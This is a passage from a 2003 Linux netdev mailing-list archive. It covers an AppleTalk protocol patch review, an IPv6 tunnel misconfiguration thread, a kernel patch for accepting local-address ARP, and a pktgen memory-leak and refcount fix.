10 Jul 2003 08:46:15 -0700 (PDT) Received: from orion.netbank.com.br (orion.netbank.com.br [200.203.199.90]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AFk72x010320 for ; Thu, 10 Jul 2003 08:46:09 -0700 Received: from [200.181.170.115] (helo=brinquendo.conectiva.com.br) by orion.netbank.com.br with asmtp (Exim 3.33 #1) id 19aUpI-0001e2-00; Thu, 10 Jul 2003 03:22:44 -0300 Received: by brinquendo.conectiva.com.br (Postfix, from userid 500) id 9D62C1966C; Thu, 10 Jul 2003 06:20:11 +0000 (UTC) Date: Thu, 10 Jul 2003 03:20:11 -0300 From: Arnaldo Carvalho de Melo To: Stephen Hemminger Cc: "David S. Miller" , Jay Schulist , netdev@oss.sgi.com, linux-atalk@lists.netspace.org Subject: Re: [[RFT] convert appletalk over to new protocol Message-ID: <20030710062010.GC11670@conectiva.com.br> References: <20030709131300.660c052f.shemminger@osdl.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030709131300.660c052f.shemminger@osdl.org> X-Url: http://advogato.org/person/acme Organization: Conectiva S.A. User-Agent: Mutt/1.5.4i X-archive-position: 3898 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: acme@conectiva.com.br Precedence: bulk X-list: netdev Em Wed, Jul 09, 2003 at 01:13:00PM -0700, Stephen Hemminger escreveu: > This fixes appletalk ddp protocol to address a couple of issues: > - routing code was holding a reference to device without doing ref counting. > - packet interface was old style > - add shared buffer checks > - add pullup's where needed > - change checksum to handle fragmented sk_buff's > - clean up comments to match above changes. > > I don't have real appletalk test infrastructure, and given the checksum change it should > be tested against real Apple hardware. It does build, and loads/unloads fine. I can > bring up the netatalk stuff without problem but have nothing to talk to it. I'll take a look, but I missed the sock_hold/put stuff from a first look, it is OK by now when adding and removing from a lista of socks due to the hlist conversion work, but needs to be done in routines that search a list of socks and return a sock. I do have a good Appletalk test bed, with m68k and ppc macs, but I'll only will be able to test this next wednesday, as I'll be on a business trip starting tomorrow. Good work as far as I quickly glanced, will review it further and provide comments, probably in the next days. - Arnaldo From yoshfuji@linux-ipv6.org Thu Jul 10 08:54:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 08:54:24 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AFsD2x010686 for ; Thu, 10 Jul 2003 08:54:14 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6AFtgBo001142; Fri, 11 Jul 2003 00:55:42 +0900 Date: Fri, 11 Jul 2003 00:55:42 +0900 (JST) Message-Id: <20030711.005542.04973601.yoshfuji@linux-ipv6.org> To: cat@zip.com.au Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030710154302.GE1722@zip.com.au> References: <20030710154302.GE1722@zip.com.au> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3899 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030710154302.GE1722@zip.com.au> (at Fri, 11 Jul 2003 01:43:03 +1000), CaT says: > With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection > and as such get ipv6 connectivity. I think went to 2.4.21 and then to > 2.4.22-pre4 and bringing up the tunnel fails as follows: : > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > RTNETLINK answers: Invalid argument This is not bug, but rather misconfiguration; you cannot use prefix::, which is mandatory subnet routers anycast address, as unicast address. Thank you. -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From hogarth@theirongiant.lochness.weebeastie.net Thu Jul 10 08:58:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 08:58:22 -0700 (PDT) Received: from nessie.weebeastie.net (nessie.weebeastie.net [61.8.7.205]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AFwB2x011013 for ; Thu, 10 Jul 2003 08:58:15 -0700 Received: from theirongiant.lochness.weebeastie.net (theirongiant.lochness.weebeastie.net [10.1.1.2]) by nessie.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6AFvrDb003528 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=FAIL); Fri, 11 Jul 2003 01:57:53 +1000 Received: from theirongiant.lochness.weebeastie.net (localhost [127.0.0.1]) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6AFw34u012652 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Fri, 11 Jul 2003 01:58:03 +1000 Received: (from hogarth@localhost) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) id h6AFw3Z8012651; Fri, 11 Jul 2003 01:58:03 +1000 Date: Fri, 11 Jul 2003 01:58:02 +1000 From: CaT To: "YOSHIFUJI Hideaki / ?$B5HF#1QL@" Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked Message-ID: <20030710155802.GF1722@zip.com.au> References: <20030710154302.GE1722@zip.com.au> <20030711.005542.04973601.yoshfuji@linux-ipv6.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030711.005542.04973601.yoshfuji@linux-ipv6.org> User-Agent: Mutt/1.3.28i Organisation: Furball Inc. X-archive-position: 3900 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cat@zip.com.au Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 12:55:42AM +0900, YOSHIFUJI Hideaki / ?$B5HF#1QL@ wrote: > > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > > RTNETLINK answers: Invalid argument > > This is not bug, but rather misconfiguration; > you cannot use prefix::, which is mandatory subnet routers > anycast address, as unicast address. Ok. I'm a bit lost then. What should the line be then? To me the above makes sense (and used to work), but then I'm not that experienced with IPv6... -- "How can I not love the Americans? They helped me with a flat tire the other day," he said. - http://www.toledoblade.com/apps/pbcs.dll/artikkel?SearchID=73139162287496&Avis=TO&Dato=20030624&Kategori=NEWS28&Lopenr=106240111&Ref=AR From pekkas@netcore.fi Thu Jul 10 09:08:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 09:08:46 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AG8b2x011477 for ; Thu, 10 Jul 2003 09:08:38 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6AG8Kg18686; Thu, 10 Jul 2003 19:08:20 +0300 Date: Thu, 10 Jul 2003 19:08:20 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: cat@zip.com.au, , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.005542.04973601.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3901 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article <20030710154302.GE1722@zip.com.au> (at Fri, 11 Jul 2003 01:43:03 +1000), CaT says: > > > With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection > > and as such get ipv6 connectivity. I think went to 2.4.21 and then to > > 2.4.22-pre4 and bringing up the tunnel fails as follows: > : > > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > > RTNETLINK answers: Invalid argument > > This is not bug, but rather misconfiguration; > you cannot use prefix::, which is mandatory subnet routers > anycast address, as unicast address. While technically correct, I'm still not sure if this is (pragmatically) the correct approach. It's OK to set a default route to go to the subnet routers anycast address (so, setting a route to prefix:: should not give you EINVAL). -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Thu Jul 10 09:17:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 09:17:35 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AGHT2x011859 for ; Thu, 10 Jul 2003 09:17:30 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6AGIxBo001312; Fri, 11 Jul 2003 01:18:59 +0900 Date: Fri, 11 Jul 2003 01:18:58 +0900 (JST) Message-Id: <20030711.011858.117900702.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: cat@zip.com.au, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling broken From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030711.005542.04973601.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3902 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Thu, 10 Jul 2003 19:08:20 +0300 (EEST)), Pekka Savola says: > While technically correct, I'm still not sure if this is (pragmatically) > the correct approach. It's OK to set a default route to go to the > subnet routers anycast address (so, setting a route to prefix:: should > not give you EINVAL). But, on the other side cannot use prefix::, and the setting is rather non-sense. We should educate people not to use /127; use /64 instead. v6ops? :-) -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From pekkas@netcore.fi Thu Jul 10 09:20:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 09:20:21 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AGKB2x012185 for ; Thu, 10 Jul 2003 09:20:14 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6AGJvM18828; Thu, 10 Jul 2003 19:19:57 +0300 Date: Thu, 10 Jul 2003 19:19:57 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: cat@zip.com.au, , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling broken In-Reply-To: <20030711.011858.117900702.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3903 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Thu, 10 Jul 2003 19:08:20 +0300 (EEST)), Pekka Savola says: > > > While technically correct, I'm still not sure if this is (pragmatically) > > the correct approach. It's OK to set a default route to go to the > > subnet routers anycast address (so, setting a route to prefix:: should > > not give you EINVAL). > > But, on the other side cannot use prefix::, and > the setting is rather non-sense. Not really. From the host perspective: "I want to set default route to SOME default router" (there may be multiple routers in the LAN, while only one at a time is actively responding to the anycast address; if that one goes away, another one takes its place.) > We should educate people not to use /127; use /64 instead. > v6ops? :-) That's another story.. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From mika.liljeberg@welho.com Thu Jul 10 09:27:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 09:27:27 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AGRD2x012529 for ; Thu, 10 Jul 2003 09:27:15 -0700 Received: from hades.pp.htv.fi (localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6AGRGZj006542; Thu, 10 Jul 2003 19:27:16 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6AGRDrC006541; Thu, 10 Jul 2003 19:27:13 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: CaT Cc: yoshfuji@linux-ipv6.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi In-Reply-To: <20030710154302.GE1722@zip.com.au> References: <20030710154302.GE1722@zip.com.au> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1057854432.3588.2.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 10 Jul 2003 19:27:13 +0300 X-archive-position: 3904 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Thu, 2003-07-10 at 18:43, CaT wrote: > ip tunnel add sit1 mode sit remote 138.25.6.14 > ip link set sit1 up > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > RTNETLINK answers: Invalid argument Try this: ip route add ::/0 dev sit1 MikaL From greearb@candelatech.com Thu Jul 10 09:52:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 09:53:12 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AGqv2x014387 for ; Thu, 10 Jul 2003 09:52:58 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6AGqhKk024337; Thu, 10 Jul 2003 09:52:44 -0700 Message-ID: <3F0D99DB.5040206@candelatech.com> Date: Thu, 10 Jul 2003 09:52:43 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: jleu@mindspring.com CC: Rusty Russell , netdev@oss.sgi.com, netfilter-devel@lists.netfilter.org, anton@samba.org Subject: Re: [PATCH] Netfilter crossover module. References: <20030710084820.909D12C0DA@lists.samba.org> <20030710090643.A10820@mindspring.com> In-Reply-To: <20030710090643.A10820@mindspring.com> Content-Type: multipart/mixed; boundary="------------010705080708070503070404" X-archive-position: 3905 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------010705080708070503070404 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit James R. Leu wrote: > Between you and Ben Greear the linux kernel will have every possible > scheme for sending packets to your self. > > I still think my work on this (Virtual routing and forwarding: > http://linux-vrf.sf.net/) is the less perverted(*) then the work that either > you or Ben have come up with. Plus it has other applications besides > just being able to send packets to your self. > > * in terms of the concept, not necessarily the actual implementation. >>It'd be nice to have the module hardwire the arps itself, but this was >>quickest. Patch welcome. It's likely that with my patch you wouldn't have to hard-wire arps at all. The primary thing that my patch does is to let a machine answer arps from a local interface (over the external interface). Then routing to self can happen by simply(?) binding to the local IP of your choice and using policy-based routing to route correctly. (You can loop-back through a router with this patch, for example.) So, maybe both patches are useful together.... I can't find where I posted my patch last time, so it is attached again for reference. It contains a typo-fix in a comment that may be worthy of inclusion by itself some day :) Also, when nettool (ethtool) becomes generic, the ioctl code can be configured through the nettool api, so that new ioctl will go a way. Thanks, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear --------------010705080708070503070404 Content-Type: text/plain; name="sts_2.4.20.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="sts_2.4.20.patch" --- linux-2.4.20/include/linux/sockios.h 2001-11-07 14:39:36.000000000 -0800 +++ linux-2.4.20.c3/include/linux/sockios.h 2003-03-18 14:32:53.000000000 -0800 @@ -65,6 +65,8 @@ #define SIOCDIFADDR 0x8936 /* delete PA address */ #define SIOCSIFHWBROADCAST 0x8937 /* set hardware broadcast addr */ #define SIOCGIFCOUNT 0x8938 /* get number of devices */ +#define SIOCGIFWEIGHT 0x8939 /* get weight of device, in stones */ +#define SIOCSIFWEIGHT 0x893a /* set weight of device, in stones */ #define SIOCGIFBR 0x8940 /* Bridging support */ #define SIOCSIFBR 0x8941 /* Set bridging options */ @@ -92,6 +94,10 @@ #define SIOCGRARP 0x8961 /* get RARP table entry */ #define SIOCSRARP 0x8962 /* set RARP table entry */ +/* MAC address based VLAN control calls */ +#define SIOCGIFMACVLAN 0x8965 /* Mac address multiplex/demultiplex support */ +#define SIOCSIFMACVLAN 0x8966 /* Set macvlan options */ + /* Driver configuration calls */ #define SIOCGIFMAP 0x8970 /* Get device parameters */ @@ -114,6 +120,16 @@ #define SIOCBONDINFOQUERY 0x8994 /* rtn info about bond state */ #define SIOCBONDCHANGEACTIVE 0x8995 /* update to a new active slave */ + +/* Ben's little hack land */ +#define SIOCSACCEPTLOCALADDRS 0x89a0 /* Allow interfaces to accept pkts from + * local interfaces...use with SO_BINDTODEVICE + */ +#define SIOCGACCEPTLOCALADDRS 0x89a1 /* Allow interfaces to accept pkts from + * local interfaces...use with SO_BINDTODEVICE + */ + + /* Device private ioctl calls */ /* --- linux-2.4.20/net/Config.in 2002-08-02 17:39:46.000000000 -0700 +++ linux-2.4.20.c3/net/Config.in 2003-03-18 14:32:53.000000000 -0800 @@ -48,6 +48,7 @@ bool ' Per-VC IP filter kludge' CONFIG_ATM_BR2684_IPFILTER fi fi + tristate 'MAC address based VLANs (EXPERIMENTAL)' CONFIG_MACVLAN fi tristate '802.1Q VLAN Support' CONFIG_VLAN_8021Q --- linux-2.4.20/net/ipv4/arp.c 2002-11-28 15:53:15.000000000 -0800 +++ linux-2.4.20.c3/net/ipv4/arp.c 2003-03-18 14:32:53.000000000 -0800 @@ -1,4 +1,4 @@ -/* linux/net/inet/arp.c +/* linux/net/inet/arp.c -*-linux-c-*- * * Version: $Id: arp.c,v 1.99 2001/08/30 22:55:42 davem Exp $ * @@ -351,12 +351,22 @@ int flag = 0; /*unsigned long now; */ - if (ip_route_output(&rt, sip, tip, 0, 0) < 0) + if (ip_route_output(&rt, sip, tip, 0, 0) < 0) return 1; - if (rt->u.dst.dev != dev) { - NET_INC_STATS_BH(ArpFilter); - flag = 1; - } + + if (rt->u.dst.dev != dev) { + if ((dev->priv_flags & IFF_ACCEPT_LOCAL_ADDRS) && + (rt->u.dst.dev == &loopback_dev)) { + /* OK, we'll let this special case slide, so that we can arp from one + * local interface to another. This seems to work, but could use some + * review. --Ben + */ + } + else { + NET_INC_STATS_BH(ArpFilter); + flag = 1; + } + } ip_rt_put(rt); return flag; } --- linux-2.4.20/net/ipv4/fib_frontend.c 2002-08-02 17:39:46.000000000 -0700 +++ linux-2.4.20.c3/net/ipv4/fib_frontend.c 2003-03-18 14:32:53.000000000 -0800 @@ -233,8 +233,17 @@ if (fib_lookup(&key, &res)) goto last_resort; - if (res.type != RTN_UNICAST) - goto e_inval_res; + + if (res.type != RTN_UNICAST) { + if ((res.type == RTN_LOCAL) && + (dev->priv_flags & IFF_ACCEPT_LOCAL_ADDRS)) { + /* All is OK */ + } + else { + goto e_inval_res; + } + } + *spec_dst = FIB_RES_PREFSRC(res); fib_combine_itag(itag, &res); #ifdef CONFIG_IP_ROUTE_MULTIPATH --- linux-2.4.20/net/ipv4/tcp_ipv4.c 2002-11-28 15:53:15.000000000 -0800 +++ linux-2.4.20.c3/net/ipv4/tcp_ipv4.c 2003-03-18 14:32:53.000000000 -0800 @@ -1394,7 +1394,7 @@ #define want_cookie 0 /* Argh, why doesn't gcc optimize this :( */ #endif - /* Never answer to SYNs send to broadcast or multicast */ + /* Never answer to SYNs sent to broadcast or multicast */ if (((struct rtable *)skb->dst)->rt_flags & (RTCF_BROADCAST|RTCF_MULTICAST)) goto drop; --------------010705080708070503070404-- From jgarzik@pobox.com Thu Jul 10 10:41:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 10:41:28 -0700 (PDT) Received: from www.linux.org.uk (IDENT:Mo2Lx2VdagYDMQtvx4rrVSKZS3WvJFNh@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AHfF2x015545 for ; Thu, 10 Jul 2003 10:41:17 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19afPu-00015K-99 for netdev@oss.sgi.com; Thu, 10 Jul 2003 18:41:14 +0100 Message-ID: <3F0DA525.2080808@pobox.com> Date: Thu, 10 Jul 2003 13:40:53 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Maillist netdev Subject: [Fwd: PATCH pktgen hang, memleak, fixes] Content-Type: multipart/mixed; boundary="------------010608040006050807000806" X-archive-position: 3906 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------010608040006050807000806 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit --------------010608040006050807000806 Content-Type: message/rfc822; name="PATCH pktgen hang, memleak, fixes" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="PATCH pktgen hang, memleak, fixes" Return-Path: Delivered-To: garzik@gtf.org Received: from puzzle.pobox.com (puzzle.pobox.com [207.106.49.20]) by havoc.gtf.org (Postfix) with ESMTP id 7E495665C for ; Thu, 10 Jul 2003 11:27:15 -0400 (EDT) Received: from puzzle.pobox.com (localhost [127.0.0.1]) by puzzle.pobox.com (Postfix) with ESMTP id E4B9426C011 for ; Thu, 10 Jul 2003 11:27:14 -0400 (EDT) Delivered-To: jgarzik@pobox.com Received: from vger.kernel.org (vger.kernel.org [209.116.70.75]) by puzzle.pobox.com (Postfix) with ESMTP id C3B2526C124 for ; Thu, 10 Jul 2003 11:27:14 -0400 (EDT) Received: (majordomo@vger.kernel.org) by vger.kernel.org via listexpand id S269321AbTGJPHs (ORCPT ); Thu, 10 Jul 2003 11:07:48 -0400 Received: (majordomo@vger.kernel.org) by vger.kernel.org id S269324AbTGJPHr (ORCPT ); Thu, 10 Jul 2003 11:07:47 -0400 Received: from sea2-f47.sea2.hotmail.com ([207.68.165.47]:64013 "EHLO hotmail.com") by vger.kernel.org with ESMTP id S269321AbTGJPHp (ORCPT ); Thu, 10 Jul 2003 11:07:45 -0400 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 10 Jul 2003 08:22:25 -0700 Received: from 63.173.114.243 by sea2fd.sea2.hotmail.msn.com with HTTP; Thu, 10 Jul 2003 15:22:24 GMT X-Originating-IP: [63.173.114.243] X-Originating-Email: [kambo77@hotmail.com] From: "Kambo Lohan" To: linux-kernel@vger.kernel.org Subject: PATCH pktgen hang, memleak, fixes Date: Thu, 10 Jul 2003 11:22:24 -0400 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 10 Jul 2003 15:22:25.0186 (UTC) FILETIME=[10F4F020:01C346F7] Sender: linux-kernel-owner@vger.kernel.org Precedence: bulk X-Mailing-List: linux-kernel@vger.kernel.org X-Spam-Status: No, hits=-4.7 required=7.0 tests=AWL,BAYES_10,FROM_ENDS_IN_NUMS,PATCH_UNIFIED_DIFF, X_MAILING_LIST version=2.55 X-Spam-Level: X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp) This should fix about 3 things. My first patch, be gentle... 2.5 has the same problem but I do not know if this will apply or not, we run 2.4. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> --- linux-2.4.21/net/core/pktgen.c 2002-11-28 18:53:15.000000000 -0500 +++ linux-2.4-kjp/net/core/pktgen.c 2003-07-10 11:08:31.000000000 -0400 @@ -34,6 +34,7 @@ * * The new changes seem to have a performance impact of around 1%, * as far as I can tell. * --Ben Greear + * Fix refcount off by one if first packet fails, potential null deref, memleak 030710- KJP * * Renamed multiskb to clone_skb and cleaned up sending core for two distinct * skb modes. A clone_skb=0 mode for Ben "ranges" work and a clone_skb != 0 @@ -84,9 +85,9 @@ #define cycles() ((u32)get_cycles()) -#define VERSION "pktgen version 1.2" +#define VERSION "pktgen version 1.2.1" static char version[] __initdata = - "pktgen.c: v1.2: Packet Generator for packet performance testing.\n"; + "pktgen.c: v1.2.1: Packet Generator for packet performance testing.\n"; /* Used to help with determining the pkts on receive */ @@ -613,12 +614,11 @@ kfree_skb(skb); skb = fill_packet(odev, info); if (skb == NULL) { - break; + goto out_reldev; } fp++; fp_tmp = 0; /* reset counter */ } - atomic_inc(&skb->users); } nr_frags = skb_shinfo(skb)->nr_frags; @@ -634,9 +634,10 @@ last_ok = 0; } else { - last_ok = 1; - info->sofar++; - info->seq_num++; + atomic_inc(&skb->users); + last_ok = 1; + info->sofar++; + info->seq_num++; } } else { @@ -707,6 +708,7 @@ } }/* while we should be running */ + do_gettimeofday(&(info->stopped_at)); total = (info->stopped_at.tv_sec - info->started_at.tv_sec) * 1000000 + @@ -731,6 +733,8 @@ (unsigned long long) info->errors ); } + + kfree_skb(skb); out_reldev: if (odev) { _________________________________________________________________ STOP MORE SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ --------------010608040006050807000806-- From yoshfuji@wide.ad.jp Thu Jul 10 11:05:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 11:05:57 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AI5o2x016014 for ; Thu, 10 Jul 2003 11:05:51 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6AI7NBo001866 for ; Fri, 11 Jul 2003 03:07:23 +0900 Resent-Date: Fri, 11 Jul 2003 03:07:23 +0900 (JST) Resent-Message-Id: 